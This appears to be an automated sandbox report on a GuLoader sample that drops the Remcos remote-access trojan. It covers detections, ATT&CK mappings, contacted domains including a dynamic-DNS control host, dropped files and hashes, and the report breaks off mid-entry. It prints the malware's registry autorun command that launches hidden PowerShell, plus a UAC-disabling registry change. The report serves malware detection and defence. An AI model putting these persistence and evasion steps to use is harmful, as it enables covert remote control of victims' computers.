          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTRI
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\[
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6)\Comm
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managertdesk@
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.000000000814A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1B

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Disables UAC (registry)
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
          Source: Amcache.hve.33.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.33.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Detected Remcos RAT
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4DJump to behavior
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		11
          Input Capture          		3
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts11
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		1
          Obfuscated Files or Information          		LSASS Memory24
          System Information Discovery          		Remote Desktop Protocol11
          Input Capture          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)12
          Process Injection          		1
          Software Packing          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		1
          Remote Access Software          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
          Masquerading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeylogging213
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Modify Registry          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Process Injection          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502984 Sample: anziOUzZJs.exe Startdate: 02/09/2024 Architecture: WINDOWS Score: 100 53 a458386d9.duckdns.org 2->53 55 drive.usercontent.google.com 2->55 57 drive.google.com 2->57 69 Found malware configuration 2->69 71 Multi AV Scanner detection for dropped file 2->71 73 Multi AV Scanner detection for submitted file 2->73 77 5 other signatures 2->77 9 anziOUzZJs.exe 32 2->9         started        13 svchost.exe 1 1 2->13         started        signatures3 75 Uses dynamic DNS services 53->75 process4 dnsIp5 43 C:\Users\user\AppData\Local\...\BgImage.dll, PE32 9->43 dropped 45 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 9->45 dropped 47 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 9->47 dropped 81 Suspicious powershell command line found 9->81 16 powershell.exe 5 29 9->16         started        59 127.0.0.1 unknown unknown 13->59 file6 signatures7 process8 dnsIp9 49 drive.usercontent.google.com 142.250.181.225, 443, 49729 GOOGLEUS United States 16->49 51 drive.google.com 142.250.184.238, 443, 49726 GOOGLEUS United States 16->51 39 C:\Users\user\AppData\...\Partivarerne.scr, PE32 16->39 dropped 41 C:\ProgramData\remcos\logs.dat, data 16->41 dropped 61 Detected Remcos RAT 16->61 63 Drops PE files with a suspicious file extension 16->63 65 Found suspicious powershell code related to unpacking or dynamic code loading 16->65 67 2 other signatures 16->67 21 cmd.exe 1 16->21         started        24 cmd.exe 1 16->24         started        26 WerFault.exe 23 16 16->26         started        28 2 other processes 16->28 file10 signatures11 process12 signatures13 79 Uses cmd line tools excessively to alter registry or file data 21->79 30 reg.exe 1 21->30         started        33 conhost.exe 21->33         started        35 conhost.exe 24->35         started        37 reg.exe 1 1 24->37         started        process14 signatures15 83 Disables UAC (registry) 30->83

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          anziOUzZJs.exe53%ReversingLabsWin32.Trojan.GuLoader

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Partivarerne.scr53%ReversingLabsWin32.Trojan.GuLoader
          C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://g.live.com/odclientsettings/Prod1C:0%URL Reputationsafe
          http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://g.live.com/odclientsettings/ProdV21C:0%URL Reputationsafe
          http://upx.sf.net0%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://drive.usercontent.google.com/1$T0%Avira URL Cloudsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
          https://drive.google.com/0%Avira URL Cloudsafe
          http://crl.ver)0%Avira URL Cloudsafe
          https://drive.google.com//0%Avira URL Cloudsafe
          PP9.duckdns.org0%Avira URL Cloudsafe
          https://drive.usercontent.google.com/0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          		142.250.184.238
          		truefalse
            		unknown
            drive.usercontent.google.com
            		142.250.181.225
            		truefalse
              		unknown
              a458386d9.duckdns.org
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                PP9.duckdns.orgtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://g.live.com/odclientsettings/Prod1C:edb.log.26.drfalse
                • URL Reputation: safe
                		unknown
                http://nsis.sf.net/NSIS_ErroranziOUzZJs.exe, Partivarerne.scr.10.drfalse
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://drive.google.com/powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://drive.usercontent.google.com/1$Tpowershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.google.com//powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000001A.00000003.1875644629.0000014BA02D0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drfalse
                • URL Reputation: safe
                		unknown
                http://crl.ver)svchost.exe, 0000001A.00000002.2506873908.0000014BA0400000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://drive.usercontent.google.com/powershell.exe, 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://upx.sf.netAmcache.hve.33.drfalse
                • URL Reputation: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorErroranziOUzZJs.exe, Partivarerne.scr.10.drfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                142.250.181.225
                		drive.usercontent.google.comUnited States
                		15169GOOGLEUSfalse
                142.250.184.238
                		drive.google.comUnited States
                		15169GOOGLEUSfalse

                Private

                IP
                127.0.0.1

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1502984
                Start date and time:2024-09-02 16:18:50 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 4s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:37
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:anziOUzZJs.exe
                renamed because original name is a hash value
                Original Sample Name:39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@17/34@6/3
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 134
                • Number of non-executed functions: 39
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, MoUsoCoreWorker.exe, UsoClient.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 104.208.16.94
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                • Execution Graph export aborted for target powershell.exe, PID 7800 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: anziOUzZJs.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:19:49API Interceptor39x Sleep call for process: powershell.exe modified
                11:34:09API Interceptor2x Sleep call for process: svchost.exe modified
                11:34:16API Interceptor2x Sleep call for process: WerFault.exe modified
                17:34:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Preferentialist %Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)
                17:34:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Preferentialist %Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e194Z8GoGGGLH.exeGet hashmaliciousGuLoaderBrowse
                • 142.250.184.238
                • 142.250.181.225
                3s1p0f5k7j.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 142.250.184.238
                • 142.250.181.225
                VG1l3rzJtd.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 142.250.184.238
                • 142.250.181.225
                Modifications_List.oneGet hashmaliciousAZORultBrowse
                • 142.250.184.238
                • 142.250.181.225
                Run First.exeGet hashmaliciousUnknownBrowse
                • 142.250.184.238
                • 142.250.181.225
                Run First.exeGet hashmaliciousUnknownBrowse
                • 142.250.184.238
                • 142.250.181.225
                SecuriteInfo.com.FileRepMalware.28303.12839.exeGet hashmaliciousUnknownBrowse
                • 142.250.184.238
                • 142.250.181.225
                Unmovablety.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 142.250.184.238
                • 142.250.181.225
                PO 7001628119_61900PM.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 142.250.184.238
                • 142.250.181.225
                Document#.exeGet hashmaliciousRemcosBrowse
                • 142.250.184.238
                • 142.250.181.225

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dllPTFE Coated Butterfly Valve Picture#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  bPYR660y5o.exeGet hashmaliciousAzorult, GuLoaderBrowse
                    uQP25xP5DH.exeGet hashmaliciousGuLoaderBrowse
                      bPYR660y5o.exeGet hashmaliciousGuLoaderBrowse
                        uQP25xP5DH.exeGet hashmaliciousGuLoaderBrowse
                          R7MPO3ijgz.exeGet hashmaliciousGuLoaderBrowse
                            tNET06vnWS.exeGet hashmaliciousGuLoaderBrowse
                              R7MPO3ijgz.exeGet hashmaliciousGuLoaderBrowse
                                0bRKaeNvVp.exeGet hashmaliciousGuLoaderBrowse
                                  tNET06vnWS.exeGet hashmaliciousGuLoaderBrowse

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7066986611016322
                                    Encrypted:false
                                    SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqx:2JIB/wUKUKQncEmYRTwh0t
                                    MD5:4E0299DE2AA6978B73BB724E4174F5C6
                                    SHA1:BBBAD59D358C86AD256A77C58CC7C54EE5566E7A
                                    SHA-256:945AAEC220EF816C19A3B8DDB81CED658D76617C2B682F79289EA76D366745BB
                                    SHA-512:757C4DA9C2BABDB432FD78B62FFFF8EAF8C8E23F8612E7E4B88E93A60048C166D281DA1C79CA83493AE9DDC847C203E15984F0A9C8C42D9A5B0DA1BF4164E7FB
                                    Malicious:false
                                    Reputation:low
                                    Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd0726e56, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7900084431344849
                                    Encrypted:false
                                    SSDEEP:1536:TSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:TazaPvgurTd42UgSii
                                    MD5:0E1AB4FBD5F684F3A8645CA71AE4394F
                                    SHA1:1E9772E53DD70A59910997F800BA84FB6586D07B
                                    SHA-256:E385CED213CD0FF47AB5849A83F59CD76BA90506895FAF041464956C5CD4A785
                                    SHA-512:C75211EE024624F311430AE80CB053C7CF2850C7B46E44324BDD6849E1DFB986FD4D71639660049FF06F44AE1C4547B9575C72193A855B569BE8E62749F68B5B
                                    Malicious:false
                                    Preview:.rnV... ...............X\...;...{......................0.`.....42...{5.."...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................U.%."...|;.................f..t."...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08220272451867672
                                    Encrypted:false
                                    SSDEEP:3:A4l/EYeb8hRXiqNt/57Dek3JbqnhllYllEqW3l/TjzzQ/t:AGEzb8hkqPR3tbaQmd8/
                                    MD5:2596C78702428BA9259997E05C51C155
                                    SHA1:E7FB7B6F04EA4CEE0224FF19DA1E726D76038A2C
                                    SHA-256:B281E70CE26D3F13E7DB28FDCB6EBD929DCD8104E3DA765CCB50F39CA04BD654
                                    SHA-512:FB517F1E1DA9EECE4A52C5F57D4791FAEF767F5817128D48C000CA415A172DB4FBF8C18EB1DE251C8C92EF1D98C879C9F9C9800FD9F763F7887A19322C86BD2B
                                    Malicious:false
                                    Preview:.........................................;...{..."...|..42...{5.........42...{5.42...{5...Y.42...{59................f..t."...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_763cc06ddd191e0b2a3c26e6eec71deecc9f88_f469684b_9b669334-fee6-4b78-a21a-422be33222bf\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.6334241343281142
                                    Encrypted:false
